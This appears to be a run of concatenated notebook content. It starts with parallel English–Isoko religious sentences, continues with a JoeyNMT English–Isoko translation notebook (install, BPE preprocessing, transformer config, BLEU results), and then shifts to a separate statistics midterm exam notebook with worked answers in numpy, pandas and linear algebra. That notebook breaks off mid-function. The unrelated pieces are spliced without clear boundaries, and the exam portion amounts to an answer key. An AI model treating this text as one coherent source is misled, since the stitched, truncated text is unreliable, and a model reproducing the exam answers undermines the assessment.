In effect , all of us will then joyfully add our voices to the concluding portion of this beautiful and heartwarming song : “ Let his name [ that of the King Jesus Christ ] prove to be to time indefinite ; before the sun let his name have increase , and by means of him let them bless themselves ; let all nations pronounce him happy .
Still , words of apology are a strong force toward making peace .
Elijah brings the boy down to his mother and says : “ See , your son is alive . ”
By means of his ministry , he gave a priceless gift to humankind — a message that revealed the truth about God and His will .
Comparably , Christian husbands assign their mates honor and praise them .
How do we feel about all those who are making sacrifices for the Kingdom , and what should all of us consider ?
Jesus too is a shepherd and a conquering king .
These examples clearly establish that those who truly belong to Jehovah must firmly take their stand for righteousness and against wickedness .
==> dev.iso <==
Ma rẹ sae tubẹ yare Ọghẹnẹ re ọ ‘ kẹ omai eva efuafo . ’
U no ere no , a te siobọno obe usi ofa , Kingdom News No .
Mai kpobi ma te rọ oghọghọ ku irru mai gbe so abọ urere ọrọ ole omosasọ nana : “ Jọ odẹ riẹ [ ọrọ Jesu Kristi Ovie na ] o te jọ bẹdẹ bẹdẹ , re usi riẹ u ti do bẹse nọ akpọ ọ bẹoviẹ !
Ghele na , eme unu - uwou u re fi obọ họ gaga evaọ eruo udhedhẹ .
Elaeja ọ tẹ rehọ ọmọ na se oni riẹ jẹ ta nọ : “ Ri , ọmọ ra ọ zọe ” no .
Ọ rehọ ẹkwoma odibọgba riẹ kẹ ahwo - akpọ okẹ jọ nọ o ghare thesiwa — ovuẹ nọ u dhesẹ uzẹme na via kpahe Ọghẹnẹ gbe oreva riẹ .
Epọvo na re , ezae Ileleikristi a re tete eyae rai je jiri ai .
Ẹvẹ u fo nọ ma re rri inievo nọ i bi si obọ no eware jọ re a sae rọ iruo Uvie na karo , kọ eme u fo nọ mai omomọvo o re ru ?
Jesu omariẹ yọ othuru - igodẹ gbe ovie nọ o bi fi kparobọ .
Iriruo nana i dhesẹ vevẹ nọ enọ e ginẹ rrọ erọ Jihova a rẹ gbaemu nọ a re ru eware nọ i dhesẹ nọ a kiẹrẹe je mukpahe oware uyoma .
###Markdown
--- Installation of JoeyNMTJoeyNMT is a simple, minimalist NMT package which is useful for learning and teaching. Check out the documentation for JoeyNMT [here](https://joeynmt.readthedocs.io)
###Code
# Install JoeyNMT
! git clone https://github.com/joeynmt/joeynmt.git
! cd joeynmt; pip3 install .
###Output
Cloning into 'joeynmt'...
remote: Enumerating objects: 20, done.[K
remote: Counting objects: 100% (20/20), done.[K
remote: Compressing objects: 100% (17/17), done.[K
remote: Total 2204 (delta 8), reused 5 (delta 3), pack-reused 2184[K
Receiving objects: 100% (2204/2204), 2.60 MiB | 16.26 MiB/s, done.
Resolving deltas: 100% (1529/1529), done.
Processing /content/joeynmt
Requirement already satisfied: future in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (0.16.0)
Requirement already satisfied: pillow in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (6.2.2)
Requirement already satisfied: numpy<2.0,>=1.14.5 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.17.5)
Requirement already satisfied: setuptools>=41.0.0 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (42.0.2)
Requirement already satisfied: torch>=1.1 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.3.1)
Requirement already satisfied: tensorflow>=1.14 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.15.0)
Requirement already satisfied: torchtext in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (0.3.1)
Collecting sacrebleu>=1.3.6
Downloading https://files.pythonhosted.org/packages/45/31/1a135b964c169984b27fb2f7a50280fa7f8e6d9d404d8a9e596180487fd1/sacrebleu-1.4.3-py3-none-any.whl
Collecting subword-nmt
Downloading https://files.pythonhosted.org/packages/74/60/6600a7bc09e7ab38bc53a48a20d8cae49b837f93f5842a41fe513a694912/subword_nmt-0.3.7-py2.py3-none-any.whl
Requirement already satisfied: matplotlib in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (3.1.2)
Requirement already satisfied: seaborn in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (0.9.0)
Collecting pyyaml>=5.1
[?25l Downloading https://files.pythonhosted.org/packages/3d/d9/ea9816aea31beeadccd03f1f8b625ecf8f645bd66744484d162d84803ce5/PyYAML-5.3.tar.gz (268kB)
[K |████████████████████████████████| 276kB 8.2MB/s
[?25hCollecting pylint
[?25l Downloading https://files.pythonhosted.org/packages/e9/59/43fc36c5ee316bb9aeb7cf5329cdbdca89e5749c34d5602753827c0aa2dc/pylint-2.4.4-py3-none-any.whl (302kB)
[K |████████████████████████████████| 307kB 9.7MB/s
[?25hRequirement already satisfied: six==1.12 in /usr/local/lib/python3.6/dist-packages (from joeynmt==0.0.1) (1.12.0)
Requirement already satisfied: opt-einsum>=2.3.2 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (3.1.0)
Requirement already satisfied: tensorflow-estimator==1.15.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.15.1)
Requirement already satisfied: wrapt>=1.11.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.11.2)
Requirement already satisfied: tensorboard<1.16.0,>=1.15.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.15.0)
Requirement already satisfied: protobuf>=3.6.1 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (3.10.0)
Requirement already satisfied: keras-applications>=1.0.8 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.0.8)
Requirement already satisfied: wheel>=0.26 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.33.6)
Requirement already satisfied: astor>=0.6.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.8.1)
Requirement already satisfied: grpcio>=1.8.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.15.0)
Requirement already satisfied: keras-preprocessing>=1.0.5 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.1.0)
Requirement already satisfied: gast==0.2.2 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.2.2)
Requirement already satisfied: termcolor>=1.1.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (1.1.0)
Requirement already satisfied: google-pasta>=0.1.6 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.1.8)
Requirement already satisfied: absl-py>=0.7.0 in /usr/local/lib/python3.6/dist-packages (from tensorflow>=1.14->joeynmt==0.0.1) (0.9.0)
Requirement already satisfied: tqdm in /usr/local/lib/python3.6/dist-packages (from torchtext->joeynmt==0.0.1) (4.28.1)
Requirement already satisfied: requests in /usr/local/lib/python3.6/dist-packages (from torchtext->joeynmt==0.0.1) (2.21.0)
Collecting portalocker
Downloading https://files.pythonhosted.org/packages/91/db/7bc703c0760df726839e0699b7f78a4d8217fdc9c7fcb1b51b39c5a22a4e/portalocker-1.5.2-py2.py3-none-any.whl
Requirement already satisfied: typing in /usr/local/lib/python3.6/dist-packages (from sacrebleu>=1.3.6->joeynmt==0.0.1) (3.6.6)
Requirement already satisfied: cycler>=0.10 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (0.10.0)
Requirement already satisfied: pyparsing!=2.0.4,!=2.1.2,!=2.1.6,>=2.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (2.4.6)
Requirement already satisfied: kiwisolver>=1.0.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (1.1.0)
Requirement already satisfied: python-dateutil>=2.1 in /usr/local/lib/python3.6/dist-packages (from matplotlib->joeynmt==0.0.1) (2.6.1)
Requirement already satisfied: scipy>=0.14.0 in /usr/local/lib/python3.6/dist-packages (from seaborn->joeynmt==0.0.1) (1.4.1)
Requirement already satisfied: pandas>=0.15.2 in /usr/local/lib/python3.6/dist-packages (from seaborn->joeynmt==0.0.1) (0.25.3)
Collecting mccabe<0.7,>=0.6
Downloading https://files.pythonhosted.org/packages/87/89/479dc97e18549e21354893e4ee4ef36db1d237534982482c3681ee6e7b57/mccabe-0.6.1-py2.py3-none-any.whl
Collecting astroid<2.4,>=2.3.0
[?25l Downloading https://files.pythonhosted.org/packages/ad/ae/86734823047962e7b8c8529186a1ac4a7ca19aaf1aa0c7713c022ef593fd/astroid-2.3.3-py3-none-any.whl (205kB)
[K |████████████████████████████████| 215kB 19.9MB/s
[?25hCollecting isort<5,>=4.2.5
[?25l Downloading https://files.pythonhosted.org/packages/e5/b0/c121fd1fa3419ea9bfd55c7f9c4fedfec5143208d8c7ad3ce3db6c623c21/isort-4.3.21-py2.py3-none-any.whl (42kB)
[K |████████████████████████████████| 51kB 9.1MB/s
[?25hRequirement already satisfied: werkzeug>=0.11.15 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow>=1.14->joeynmt==0.0.1) (0.16.0)
Requirement already satisfied: markdown>=2.6.8 in /usr/local/lib/python3.6/dist-packages (from tensorboard<1.16.0,>=1.15.0->tensorflow>=1.14->joeynmt==0.0.1) (3.1.1)
Requirement already satisfied: h5py in /usr/local/lib/python3.6/dist-packages (from keras-applications>=1.0.8->tensorflow>=1.14->joeynmt==0.0.1) (2.8.0)
Requirement already satisfied: urllib3<1.25,>=1.21.1 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (1.24.3)
Requirement already satisfied: chardet<3.1.0,>=3.0.2 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (3.0.4)
Requirement already satisfied: idna<2.9,>=2.5 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (2.8)
Requirement already satisfied: certifi>=2017.4.17 in /usr/local/lib/python3.6/dist-packages (from requests->torchtext->joeynmt==0.0.1) (2019.11.28)
Requirement already satisfied: pytz>=2017.2 in /usr/local/lib/python3.6/dist-packages (from pandas>=0.15.2->seaborn->joeynmt==0.0.1) (2018.9)
Collecting lazy-object-proxy==1.4.*
[?25l Downloading https://files.pythonhosted.org/packages/0b/dd/b1e3407e9e6913cf178e506cd0dee818e58694d9a5cd1984e3f6a8b9a10f/lazy_object_proxy-1.4.3-cp36-cp36m-manylinux1_x86_64.whl (55kB)
[K |████████████████████████████████| 61kB 9.3MB/s
[?25hCollecting typed-ast<1.5,>=1.4.0; implementation_name == "cpython" and python_version < "3.8"
[?25l Downloading https://files.pythonhosted.org/packages/90/ed/5459080d95eb87a02fe860d447197be63b6e2b5e9ff73c2b0a85622994f4/typed_ast-1.4.1-cp36-cp36m-manylinux1_x86_64.whl (737kB)
[K |████████████████████████████████| 747kB 19.9MB/s
[?25hBuilding wheels for collected packages: joeynmt, pyyaml
Building wheel for joeynmt (setup.py) ... [?25l[?25hdone
Created wheel for joeynmt: filename=joeynmt-0.0.1-cp36-none-any.whl size=72136 sha256=bbe4d9c5390f6074d9a813a1690ae719d37cd77bbc8e1865105668a1862dac9a
Stored in directory: /tmp/pip-ephem-wheel-cache-1h4i3ayp/wheels/db/01/db/751cc9f3e7f6faec127c43644ba250a3ea7ad200594aeda70a
Building wheel for pyyaml (setup.py) ... [?25l[?25hdone
Created wheel for pyyaml: filename=PyYAML-5.3-cp36-cp36m-linux_x86_64.whl size=44229 sha256=36c938900abf13262c7d1bab10af4ffe976a172a0b9de62ad4a123c307bb7417
Stored in directory: /root/.cache/pip/wheels/e4/76/4d/a95b8dd7b452b69e8ed4f68b69e1b55e12c9c9624dd962b191
Successfully built joeynmt pyyaml
Installing collected packages: portalocker, sacrebleu, subword-nmt, pyyaml, mccabe, lazy-object-proxy, typed-ast, astroid, isort, pylint, joeynmt
Found existing installation: PyYAML 3.13
Uninstalling PyYAML-3.13:
Successfully uninstalled PyYAML-3.13
Successfully installed astroid-2.3.3 isort-4.3.21 joeynmt-0.0.1 lazy-object-proxy-1.4.3 mccabe-0.6.1 portalocker-1.5.2 pylint-2.4.4 pyyaml-5.3 sacrebleu-1.4.3 subword-nmt-0.3.7 typed-ast-1.4.1
###Markdown
Preprocessing the Data into Subword BPE Tokens- One of the most powerful improvements for agglutinative languages (a feature of most Bantu languages) is using BPE tokenization [ (Sennrich, 2015) ](https://arxiv.org/abs/1508.07909).- It was also shown that by optimizing the umber of BPE codes we significantly improve results for low-resourced languages [(Sennrich, 2019)](https://www.aclweb.org/anthology/P19-1021) [(Martinus, 2019)](https://arxiv.org/abs/1906.05685)- Below we have the scripts for doing BPE tokenization of our data. We use 4000 tokens as recommended by [(Sennrich, 2019)](https://www.aclweb.org/anthology/P19-1021). You do not need to change anything. Simply running the below will be suitable.
###Code
# One of the huge boosts in NMT performance was to use a different method of tokenizing.
# Usually, NMT would tokenize by words. However, using a method called BPE gave amazing boosts to performance
# Do subword NMT
from os import path
os.environ["src"] = source_language # Sets them in bash as well, since we often use bash scripts
os.environ["tgt"] = target_language
# Learn BPEs on the training data.
os.environ["data_path"] = path.join("joeynmt", "data", source_language + target_language) # Herman!
! subword-nmt learn-joint-bpe-and-vocab --input train.$src train.$tgt -s 4000 -o bpe.codes.4000 --write-vocabulary vocab.$src vocab.$tgt
# Apply BPE splits to the development and test data.
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$src < train.$src > train.bpe.$src
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$tgt < train.$tgt > train.bpe.$tgt
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$src < dev.$src > dev.bpe.$src
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$tgt < dev.$tgt > dev.bpe.$tgt
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$src < test.$src > test.bpe.$src
! subword-nmt apply-bpe -c bpe.codes.4000 --vocabulary vocab.$tgt < test.$tgt > test.bpe.$tgt
# Create directory, move everyone we care about to the correct location
! mkdir -p $data_path
! cp train.* $data_path
! cp test.* $data_path
! cp dev.* $data_path
! cp bpe.codes.4000 $data_path
! ls $data_path
# Also move everything we care about to a mounted location in google drive (relevant if running in colab) at gdrive_path
! cp train.* "$gdrive_path"
! cp test.* "$gdrive_path"
! cp dev.* "$gdrive_path"
! cp bpe.codes.4000 "$gdrive_path"
! ls "$gdrive_path"
# Create that vocab using build_vocab
! sudo chmod 777 joeynmt/scripts/build_vocab.py
! joeynmt/scripts/build_vocab.py joeynmt/data/$src$tgt/train.bpe.$src joeynmt/data/$src$tgt/train.bpe.$tgt --output_path joeynmt/data/$src$tgt/vocab.txt
# Some output
! echo "BPE Isoko Sentences"
! tail -n 5 test.bpe.$tgt
! echo "Combined BPE Vocab"
! tail -n 10 joeynmt/data/$src$tgt/vocab.txt # Herman
! cp joeynmt/data/$src$tgt/vocab.txt "$gdrive_path"
# Also move everything we care about to a mounted location in google drive (relevant if running in colab) at gdrive_path
! cp train.* "$gdrive_path"
! cp test.* "$gdrive_path"
! cp dev.* "$gdrive_path"
! cp bpe.codes.4000 "$gdrive_path"
! ls "$gdrive_path"
###Output
bpe.codes.4000 dev.en test.bpe.iso test.iso train.en
dev.bpe.en dev.iso test.en train.bpe.en train.iso
dev.bpe.iso test.bpe.en test.en-any.en train.bpe.iso vocab.txt
###Markdown
Creating the JoeyNMT ConfigJoeyNMT requires a yaml config. We provide a template below. We've also set a number of defaults with it, that you may play with!- We used Transformer architecture - We set our dropout to reasonably high: 0.3 (recommended in [(Sennrich, 2019)](https://www.aclweb.org/anthology/P19-1021))Things worth playing with:- The batch size (also recommended to change for low-resourced languages)- The number of epochs (we've set it at 30 just so it runs in about an hour, for testing purposes)- The decoder options (beam_size, alpha)- Evaluation metrics (BLEU versus Crhf4)
###Code
# This creates the config file for our JoeyNMT system. It might seem overwhelming so we've provided a couple of useful parameters you'll need to update
# (You can of course play with all the parameters if you'd like!)
name = '%s%s' % (source_language, target_language)
gdrive_path = os.environ["gdrive_path"]
# Create the config
config = """
name: "{name}_transformer"
data:
src: "{source_language}"
trg: "{target_language}"
train: "{gdrive_path}/train.bpe"
dev: "{gdrive_path}/dev.bpe"
test: "{gdrive_path}/test.bpe"
level: "bpe"
lowercase: False
max_sent_length: 100
src_vocab: "{gdrive_path}/vocab.txt"
trg_vocab: "{gdrive_path}/vocab.txt"
testing:
beam_size: 5
alpha: 1.0
training:
load_model: "{gdrive_path}/models/{name}_transformer_orig/142000.ckpt" # if uncommented, load a pre-trained model from this checkpoint
random_seed: 42
optimizer: "adam"
normalization: "tokens"
adam_betas: [0.9, 0.999]
scheduling: "plateau" # TODO: try switching from plateau to Noam scheduling
patience: 5 # For plateau: decrease learning rate by decrease_factor if validation score has not improved for this many validation rounds.
learning_rate_factor: 0.5 # factor for Noam scheduler (used with Transformer)
learning_rate_warmup: 1000 # warmup steps for Noam scheduler (used with Transformer)
decrease_factor: 0.7
loss: "crossentropy"
learning_rate: 0.0003
learning_rate_min: 0.00000001
weight_decay: 0.0
label_smoothing: 0.1
batch_size: 4096
batch_type: "token"
eval_batch_size: 3600
eval_batch_type: "token"
batch_multiplier: 1
early_stopping_metric: "ppl"
epochs: 45 # TODO: Decrease for when playing around and checking of working. Around 30 is sufficient to check if its working at all
validation_freq: 1000 # TODO: Set to at least once per epoch.
logging_freq: 100
eval_metric: "bleu"
model_dir: "{gdrive_path}/models/{name}_transformer"
overwrite: True # TODO: Set to True if you want to overwrite possibly existing models.
shuffle: True
use_cuda: True
max_output_length: 100
print_valid_sents: [0, 1, 2, 3]
keep_last_ckpts: 3
model:
initializer: "xavier"
bias_initializer: "zeros"
init_gain: 1.0
embed_initializer: "xavier"
embed_init_gain: 1.0
tied_embeddings: True
tied_softmax: True
encoder:
type: "transformer"
num_layers: 6
num_heads: 4 # TODO: Increase to 8 for larger data.
embeddings:
embedding_dim: 256 # TODO: Increase to 512 for larger data.
scale: True
dropout: 0.2
# typically ff_size = 4 x hidden_size
hidden_size: 256 # TODO: Increase to 512 for larger data.
ff_size: 1024 # TODO: Increase to 2048 for larger data.
dropout: 0.3
decoder:
type: "transformer"
num_layers: 6
num_heads: 4 # TODO: Increase to 8 for larger data.
embeddings:
embedding_dim: 256 # TODO: Increase to 512 for larger data.
scale: True
dropout: 0.2
# typically ff_size = 4 x hidden_size
hidden_size: 256 # TODO: Increase to 512 for larger data.
ff_size: 1024 # TODO: Increase to 2048 for larger data.
dropout: 0.3
""".format(name=name, gdrive_path=os.environ["gdrive_path"], source_language=source_language, target_language=target_language)
with open("joeynmt/configs/transformer_{name}.yaml".format(name=name),'w') as f:
f.write(config)
! cp joeynmt/configs/transformer_$src$tgt.yaml "$gdrive_path"
###Output
_____no_output_____
###Markdown
Train the ModelThis single line of joeynmt runs the training using the config we made above
###Code
# Train the model
# You can press Ctrl-C to stop. And then run the next cell to save your checkpoints!
# !cd joeynmt; python3 -m joeynmt train configs/transformer_$src$tgt.yaml
!python3 -m joeynmt train "$gdrive_path/transformer_$src$tgt.yaml"
# Copy the created models from the notebook storage to google drive for persistant storage
# !cp -r joeynmt/models/${src}${tgt}_transformer/* "$gdrive_path/models/${src}${tgt}_transformer/"
# Output our validation accuracy epoch 1-30
! cat "$gdrive_path/models/${src}${tgt}_transformer/validations.txt"
# Output our validation accuracy last 45 epochs (upto ~100, step 250000)
! cat "$gdrive_path/models/${src}${tgt}_transformer/validations.txt"
# Test our model
! cd joeynmt; python3 -m joeynmt test "$gdrive_path/models/${src}${tgt}_transformer/config.yaml"
###Output
2020-01-18 02:53:15,890 Hello! This is Joey-NMT.
2020-01-18 02:53:41,222 dev bleu: 32.58 [Beam search decoding with beam size = 5 and alpha = 1.0]
2020-01-18 02:54:16,562 test bleu: 38.05 [Beam search decoding with beam size = 5 and alpha = 1.0]
|
exams/.ipynb_checkpoints/Midterm_Exams_Solutions_Notes-checkpoint.ipynb | ###Markdown
STA 663 Midterm ExamsPlease observe the Duke honor code for this **closed book** exam.**Permitted exceptions to the closed book rule**- You may use any of the links accessible from the Help Menu for reference - that is, you may follow a chain of clicks from the landing pages of the sites accessible through the Help Menu. If you find yourself outside the help/reference pages of `python`, `ipython`, `numpy`, `scipy`, `matplotlib`, `sympy`, `pandas`, (e.g. on a Google search page or stackoverflow or current/past versions of the STA 663 notes) you are in danger of violating the honor code and should exit immediately.- You may also use TAB or SHIFT-TAB completion, as well as `?foo`, `foo?` and `help(foo)` for any function, method or class `foo`.The total points allocated is 125, but the maximum possible is 100. Hence it is possible to score 100 even with some errors or incomplete solutions.
###Code
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import scipy.linalg as la
from collections import Counter
from functools import reduce
###Output
_____no_output_____
###Markdown
**1**. (10 points)Read the flights data at https://raw.githubusercontent.com/mwaskom/seaborn-data/master/flights.csv into a `pnadas` data frame. Find the average number of passengers per quarter (Q1, Q2, Q3,Q4) across the years 1950-1959 (inclusive of 1950 and 1959), where- Q1 = Jan, Feb, Mar- Q2 = Apr, May, Jun- Q3 = Jul, Aug, Sep- Q4 = Oct, Nov, Dec
###Code
url = 'https://raw.githubusercontent.com/mwaskom/seaborn-data/master/flights.csv'
data = pd.read_csv(url)
data.head()
mapper = {
'January': 'Q1',
'February': 'Q1',
'March': 'Q1',
'April': 'Q2',
'May': 'Q2',
'June': 'Q2',
'July': 'Q3',
'August': 'Q3',
'September': 'Q3',
'October': 'Q4',
'November': 'Q4',
'December': 'Q4',
}
data = data.replace({'month': mapper})
data = data[(data.year >= 1950) & (data.year <= 1959)]
data.groupby('month')[['passengers']].mean()
###Output
_____no_output_____
###Markdown
**2**. (10 points)The Collatz sequence is defined by the following rules for finding the next number```if the current number is even, divide by 2if the current number is odd, multiply by 3 and add 1if the current number is 1, stop```- Find the starting integer that gives the longest Collatz sequence for integers in the range(1, 10000). What is the starting number and length of this Collatz sequence?
###Code
def collatz(n):
"""Collatz sequence."""
vals = [n]
while n != 1:
if n % 2 == 0:
n //= 2
else:
n = 3*n + 1
vals.append(n)
return vals
max(((n, len(collatz(n))) for n in range(1, 10000)), key=lambda x: x[1])
###Output
_____no_output_____
###Markdown
**3**. (10 points)Recall that a covariance matrix is a matrix whose entries areFind the sample covariance matrix of the 4 features of the **iris** data set at http://bit.ly/2ow0oJO using basic `numpy` operations on `ndarrasy`. Do **not** use the `np.cov` or equivalent functions in `pandas` (except for checking). Remember to scale by $1/(n-1)$ for the sample covariance.
###Code
url = 'http://bit.ly/2ow0oJO'
iris = pd.read_csv(url)
iris.head()
X = iris.values[:, :4].astype('float')
X -= X.mean(axis=0)
(X.T @ X)/(X.shape[0]-1)
np.cov(X, rowvar=False)
###Output
_____no_output_____
###Markdown
**4**. (10 points)How many numbers in `range(100, 1000)` are divisible by 17 after you square them and add 1? Find this out using only **lambda** functions, **map**, **filter** and **reduce** on `xs`, where `xs = range(100, 10000)`.In pseudo-code, you want to achieve```pythonxs = range(100, 10000)count(y for y in (x**2 + 1 for x in xs) if y % 17 == 0)```
###Code
xs = range(100, 10000)
reduce(lambda a, b: a + b,
map(lambda x: 1,
filter(lambda x: x % 17 == 0,
map(lambda x: x**2+1, xs))))
###Output
_____no_output_____
###Markdown
**5**. (20 points)- Given the DNA sequence below, create a $4 \times 4$ transition matrix $A$ where $A[i,j]$ is the probability of the base $j$ appearing immediately after base $i$. Note that a *base* is one of the four letters `a`, `c`, `t` or `g`. The letters below should be treated as a single sequence, broken into separate lines just for formatting purposes. You should check that row probabilities sum to 1. (10 points)- Find the steady state distribution of the 4 bases from the row stochastic transition matrix - that is the, the values of $x$ for which $x^TA = x$ (You can solve this as a set of linear equations). Hint: you need to add a constraint on the values of $x$. (10 points)```gggttgtatgtcacttgagcctgtgcggacgagtgacacttgggacgtgaacagcggcggccgatacgttctctaagatcctctcccatgggcctggtctgtatggctttcttgttgtgggggcggagaggcagcgagtgggtgtacattaagcatggccaccaccatgtggagcgtggcgtggtcgcggagttggcagggtttttgggggtggggagccggttcaggtattccctccgcgtttctgtcgggtaggggggcttctcgtaagggattgctgcggccgggttctctgggccgtgatgactgcaggtgccatggaggcggtttggggggcccccggaagtctagcgggatcgggcttcgtttgtggaggagggggcgagtgcggaggtgttct```
###Code
dna = ''.join('''gggttgtatgtcacttgagcctgtgcggacgagtgacacttgggacgtgaacagcggcggccgatacgttctctaagatc
ctctcccatgggcctggtctgtatggctttcttgttgtgggggcggagaggcagcgagtgggtgtacattaagcatggcc
accaccatgtggagcgtggcgtggtcgcggagttggcagggtttttgggggtggggagccggttcaggtattccctccgc
gtttctgtcgggtaggggggcttctcgtaagggattgctgcggccgggttctctgggccgtgatgactgcaggtgccatg
gaggcggtttggggggcccccggaagtctagcgggatcgggcttcgtttgtggaggagggggcgagtgcggaggtgttct'''.split())
d = {}
for i, j in zip(dna[:], dna[1:]):
d[(i, j)] = d.get((i, j), 0) + 1
d
A = np.array([[d[(i, j)] for j in 'actg'] for i in 'actg'])
A
A = A / A.sum(axis=1)[:, None]
A
A.sum(axis=1)
###Output
_____no_output_____
###Markdown
Solution using least squares
###Code
A1 = np.r_[A.T - np.eye(4), [[1,1,1,1]]]
A1
b = np.r_[0,0,0,0,1].reshape(-1,1)
np.linalg.lstsq(A1, b, rcond=None)[0]
###Output
_____no_output_____
###Markdown
Alternative solution using eigendecomposition
###Code
e, v = np.linalg.eig(A.T)
e, v
s = v[:, 0] / v[:, 0].sum()
s.reshape(-1,1)
###Output
_____no_output_____
###Markdown
**6**. (10 points)- Find the matrix $A$ that results in rotating the standard vectors in $\mathbb{R}^2$ by 30 degrees counter-clockwise and stretches $e_1$ by a factor of 3 and contracts $e_2$ by a factor of $0.5$. - What is the inverse of this matrix? How you find the inverse should reflect your understanding.The effects of the matrix $A$ and $A^{-1}$ are shown in the figure below:
###Code
theta = 30 * np.pi/180
r = np.array([
[np.cos(theta), -np.sin(theta)],
[np.sin(theta), np.cos(theta)]
])
s = np.diag([3, 0.5])
m = r @ s
minv = np.diag(1/np.diag(s)) @ r.T
m
m1 = m @ np.eye(2)
m1
m2 = minv @ m1
plt.figure(figsize=(11, 2))
plt.subplot(131)
plt.axis([-1, 3, -0.2, 2])
for v in np.eye(2).T:
plt.arrow(*np.r_[[0,0],v],
head_width=0.05, head_length=0.1, fc='k', ec='k')
plt.xticks([0,1])
plt.yticks([0,1])
plt.title('$I_2$')
plt.subplot(132)
plt.axis([-1, 3, -0.2, 2])
for v in m1.T:
plt.arrow(*np.r_[[0,0],v],
head_width=0.05, head_length=0.1, fc='k', ec='k')
plt.xticks([0,1])
plt.yticks([0,1])
plt.title('$AI_2$')
plt.subplot(133)
plt.axis([-1, 3, -0.2, 2])
for v in m2.T:
plt.arrow(*np.r_[[0,0],v],
head_width=0.05, head_length=0.1, fc='k', ec='k')
plt.xticks([0,1])
plt.yticks([0,1])
plt.title('$A^{-1}(AI_2)$')
plt.savefig('vecs.png')
pass
###Output
_____no_output_____
###Markdown
**7**. (55 points) We observe some data points $(x_i, y_i)$, and believe that an appropriate model for the data is that$$f(x) = ax^2 + bx^3 + c\sin{x}$$with some added noise. Find optimal values of the parameters $\beta = (a, b, c)$ that minimize $\Vert y - f(x) \Vert^2$1. using `scipy.linalg.lstsq` (10 points)2. solving the normal equations $X^TX \beta = X^Ty$ (10 points)3. using `scipy.linalg.svd` (10 points)4. using gradient descent with RMSProp (no bias correction) and starting with an initial value of $\beta = \begin{bmatrix}1 & 1 & 1\end{bmatrix}$. Use a learning rate of 0.01 and 10,000 iterations. This should take a few seconds to complete. (25 points)In each case, plot the data and fitted curve using `matplotlib`.Data```x = array([ 3.4027718 , 4.29209002, 5.88176277, 6.3465969 , 7.21397852, 8.26972154, 10.27244608, 10.44703778, 10.79203455, 14.71146298])y = array([ 25.54026428, 29.4558919 , 58.50315846, 70.24957254, 90.55155435, 100.56372833, 91.83189927, 90.41536733, 90.43103028, 23.0719842 ])```
###Code
x = np.array([ 3.4027718 , 4.29209002, 5.88176277, 6.3465969 , 7.21397852,
8.26972154, 10.27244608, 10.44703778, 10.79203455, 14.71146298])
y = np.array([ 25.54026428, 29.4558919 , 58.50315846, 70.24957254,
90.55155435, 100.56372833, 91.83189927, 90.41536733,
90.43103028, 23.0719842 ])
def f(beta, x):
"""Model function."""
return beta[0]*x**2 + beta[1]*x**3 + beta[2]*np.sin(x)
###Output
_____no_output_____
###Markdown
Using `lstsq`
###Code
X = np.c_[x**2, x**3, np.sin(x)]
beta = np.linalg.lstsq(X, y, rcond=None)[0]
beta
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____
###Markdown
Using normal equations
###Code
beta = np.linalg.solve(X.T @ X, X.T @ y)
beta
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____
###Markdown
Using SVD
###Code
U, s, Vt = np.linalg.svd(X)
beta = Vt.T @ np.diag(1/s) @ U[:, :len(s)].T @ y.reshape(-1,1)
beta
plt.plot(x, y, 'o')
xp = np.linspace(0, 15, 100)
plt.plot(xp, f(beta, xp))
pass
###Output
_____no_output_____
###Markdown
Using gradient descent with RMSprop
###Code
def res(beta, x, y):
"""Resdiual funciton."""
return f(beta, x) - y
def grad(beta, x, y):
"""Gradient of function."""
return np.array([
np.sum(x**2 * res(beta, x, y)),
np.sum(x**3 * res(beta, x, y)),
